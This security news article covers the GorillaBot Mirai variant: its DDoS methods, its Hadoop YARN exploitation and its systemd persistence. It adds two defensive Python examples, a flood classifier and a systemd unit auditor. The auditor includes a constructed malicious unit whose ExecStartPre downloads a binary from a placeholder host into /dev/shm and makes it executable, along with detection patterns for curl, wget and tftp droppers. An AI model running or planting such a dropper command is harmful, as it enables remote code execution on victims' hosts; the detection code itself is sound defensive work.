Cybersecurity researchers have discovered a new variant of the notorious Mirai botnet, dubbed Gorilla (aka GorillaBot), which issued over 300,000 attack commands between September 4 and September 27, 2024. According to NSFOCUS, the cybersecurity firm that identified the botnet, it averaged no fewer than 20,000 distributed denial-of-service (DDoS) commands per day over that period, an unusually dense attack schedule for a newly observed family.
The GorillaBot has already impacted more than 100 countries, including China, the U.S., Canada, and Germany, targeting universities, government websites, telecom providers, banks, and the gaming and gambling sectors.
The malware uses a variety of DDoS methods to overwhelm its targets, including UDP flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, SYN flood, and ACK flood. Because UDP is connectionless and needs no handshake, the source address on UDP flood and VSE flood packets can be spoofed, which hides the bots and defeats simple per-source filtering; a SYN flood can spoof its source for the same reason, since the bot never needs to complete the handshake. The result is a large volume of malicious traffic whose apparent origins are unreliable.
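As an added illustration (this is example code written for this page, not NSFOCUS's tooling or anything from the botnet), the following Python classifies packet records into the flood types named above and flags a destination whose per-window packet rate crosses a threshold. The packet records, the destination addresses, the thresholds and the window size are all constructed assumptions; the VSE signature is the public Source Engine A2S_INFO query header. The ACK BYPASS variant is not separated out here because the article gives no wire-level description of it, so those packets would land in the plain ACK bucket.

```python
from collections import Counter

# A2S_INFO request header from the public Valve Source query protocol;
# a VSE flood sprays these at a target's game port.
VSE_QUERY = b"\xff\xff\xff\xffTSource Engine Query\x00"


def classify_packet(pkt):
    """Map one packet record (constructed dict: proto, flags, payload) to a flood class."""
    if pkt["proto"] == "udp":
        if pkt.get("payload", b"").startswith(VSE_QUERY):
            return "vse_flood"
        return "udp_flood"
    if pkt["proto"] == "tcp":
        flags = set(pkt.get("flags", ""))
        if flags == {"S"}:
            return "syn_flood"
        if flags == {"A"}:          # ACK BYPASS is not distinguishable here (assumption)
            return "ack_flood"
    return "other"


def detect_floods(packets, window_s=1.0, threshold=50):
    """Count packets per (destination, class, time window) and return the
    (dst, class, window, count) tuples at or above threshold, sorted."""
    buckets = Counter()
    for pkt in packets:
        window = int(pkt["ts"] // window_s)
        buckets[(pkt["dst"], classify_packet(pkt), window)] += 1
    return sorted((d, c, w, n) for (d, c, w), n in buckets.items() if n >= threshold)


def spoofing_indicator(packets, dst):
    """Number of distinct sources hitting dst. A very high count with a uniform
    payload is consistent with spoofed UDP/SYN sources rather than real clients."""
    return len({p["src"] for p in packets if p["dst"] == dst})


def make_sample():
    """Constructed traffic: 200 VSE queries from 200 different (spoofed-looking)
    sources, a 120-packet SYN flood from one host, and five benign ACKs."""
    target = "203.0.113.10"        # documentation address, assumed target
    pkts = []
    for i in range(200):
        pkts.append({"ts": 0.001 * i, "src": f"10.0.{i // 250}.{i % 250 + 1}",
                     "dst": target, "proto": "udp", "dport": 27015, "payload": VSE_QUERY})
    for i in range(120):
        pkts.append({"ts": 0.5 + 0.001 * i, "src": "198.51.100.7",
                     "dst": target, "proto": "tcp", "flags": "S"})
    for i in range(5):
        pkts.append({"ts": 0.2 * i, "src": "192.0.2.4",
                     "dst": target, "proto": "tcp", "flags": "A"})
    return pkts


if __name__ == "__main__":
    sample = make_sample()
    for dst, cls, win, n in detect_floods(sample):
        print(f"{dst} window={win} {cls}: {n} packets")
    print("distinct sources:", spoofing_indicator(sample, "203.0.113.10"))
```

In a real deployment the records would come from a flow exporter or packet capture rather than the constructed `make_sample()`, and the threshold would be tuned per service; the point is that flood class and source diversity are both cheap to compute and together separate a spoofed flood from a legitimate traffic spike.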
NSFOCUS also revealed that GorillaBot supports multiple CPU architectures like ARM, MIPS, x86_64, and x86, making it adaptable to a wide range of devices. It connects to one of five predefined command-and-control (C2) servers to receive DDoS attack commands.
Interestingly, GorillaBot also exploits a security flaw in Apache Hadoop YARN RPC to achieve remote code execution; the weakness, which stems from YARN ResourceManager interfaces reachable without authentication, has been actively exploited by other malware since at least 2021. Once the botnet compromises a device, it establishes persistence by dropping files into system directories such as /etc/systemd/system/ and registering them as services so that they run at system startup or user login.
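One check a defender can run against the persistence technique just described is an audit of systemd unit files for services that start at boot or login from locations no packaged service would use. The Python below is an added example written for this page, not a tool from NSFOCUS or from the article; the unit directories, the "suspicious path" prefixes, the inline-download pattern and the two sample unit files are all constructed assumptions rather than indicators taken from the GorillaBot sample.

```python
import os
import re
import tempfile
from pathlib import Path

# Directories systemd reads unit files from. The first is the drop location named
# in the article; the user directory is the per-login equivalent (assumed list).
UNIT_DIRS = [
    "/etc/systemd/system",
    "/run/systemd/system",
    os.path.expanduser("~/.config/systemd/user"),
]

# Paths a legitimately packaged service binary almost never lives in (assumption).
WRITABLE_PREFIX = re.compile(r"^(/tmp|/var/tmp|/dev/shm|/home/[^/]+|/root)(/|$)")
# An inline shell whose command line contains a downloader: a typical dropper shape.
INLINE_DOWNLOAD = re.compile(r"\b(sh|bash|dash)\b.*\s-c\b.*\b(curl|wget|tftp)\b")


def parse_unit(text):
    """Minimal INI reader for unit files: {section: {key: [values...]}}.
    Repeated keys such as several ExecStartPre= lines accumulate; comments are skipped."""
    units, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            units.setdefault(section, {})
        elif "=" in line and section is not None:
            key, _, value = line.partition("=")
            units[section].setdefault(key.strip(), []).append(value.strip())
    return units


def audit_unit(path, text):
    """Return a list of (path, reason) findings for one unit file."""
    findings = []
    units = parse_unit(text)
    service = units.get("Service", {})
    for key in ("ExecStart", "ExecStartPre", "ExecStartPost", "ExecReload"):
        for cmd in service.get(key, []):
            cmd = cmd.lstrip("-@+!:")                  # strip systemd exec-line prefixes
            argv0 = cmd.split(None, 1)[0] if cmd.split() else ""
            if WRITABLE_PREFIX.match(argv0):
                findings.append((path, f"{key} runs from a writable/user path: {argv0}"))
            if INLINE_DOWNLOAD.search(cmd):
                findings.append((path, f"{key} is an inline shell download: {cmd}"))
    # Only worth noting the auto-start hook when the unit is otherwise suspicious.
    install = units.get("Install", {})
    targets = install.get("WantedBy", []) + install.get("RequiredBy", [])
    if findings and any(t in ("multi-user.target", "default.target") for t in targets):
        findings.append((path, f"auto-started at boot/login via {', '.join(targets)}"))
    return findings


def scan_dirs(dirs=UNIT_DIRS):
    """Audit every *.service file under the given directories; missing dirs are skipped."""
    findings = []
    for d in dirs:
        p = Path(d)
        if not p.is_dir():
            continue
        for unit in sorted(p.glob("*.service")):
            try:
                findings.extend(audit_unit(str(unit), unit.read_text(errors="replace")))
            except OSError:
                continue
    return findings


# Two constructed unit files: one ordinary daemon and one dropper-style service.
BENIGN_UNIT = """[Unit]
Description=Example daemon (constructed sample)
After=network.target

[Service]
ExecStart=/usr/sbin/exampled --foreground
Restart=on-failure

[Install]
WantedBy=multi-user.target
"""

SUSPECT_UNIT = """[Unit]
Description=system update

[Service]
Type=simple
ExecStartPre=/bin/sh -c "curl -s http://example.invalid/x -o /dev/shm/.x; chmod +x /dev/shm/.x"
ExecStart=/dev/shm/.x
Restart=always

[Install]
WantedBy=multi-user.target
"""


def make_sample_tree():
    """Write the two constructed units into a temp dir and return its path."""
    d = tempfile.mkdtemp(prefix="unit-audit-")
    Path(d, "exampled.service").write_text(BENIGN_UNIT)
    Path(d, "sysupdate.service").write_text(SUSPECT_UNIT)
    return d


if __name__ == "__main__":
    for path, reason in scan_dirs([make_sample_tree()]):
        print(f"{path}: {reason}")
```

Run against the real `UNIT_DIRS` (by calling `scan_dirs()` with no argument) on a host you suspect, and compare any flagged unit against the package manager's file list; a unit that no package owns and that starts a binary from /dev/shm or a home directory is the pattern the article describes.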
The botnet also uses encryption routines commonly seen in malware from the Keksec group, which hampers static analysis of its strings and configuration and reflects deliberate counter-detection work. That evasion helps the operators keep long-term control of compromised IoT devices and cloud hosts, and shows a level of awareness and adaptability unusual for a newly emerged family.
Cybersecurity experts recommend vigilance and prompt patching, and keeping Apache Hadoop YARN interfaces and IoT management ports off the public internet, to reduce the risk of GorillaBot recruiting more hosts and of its DDoS attacks.
© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067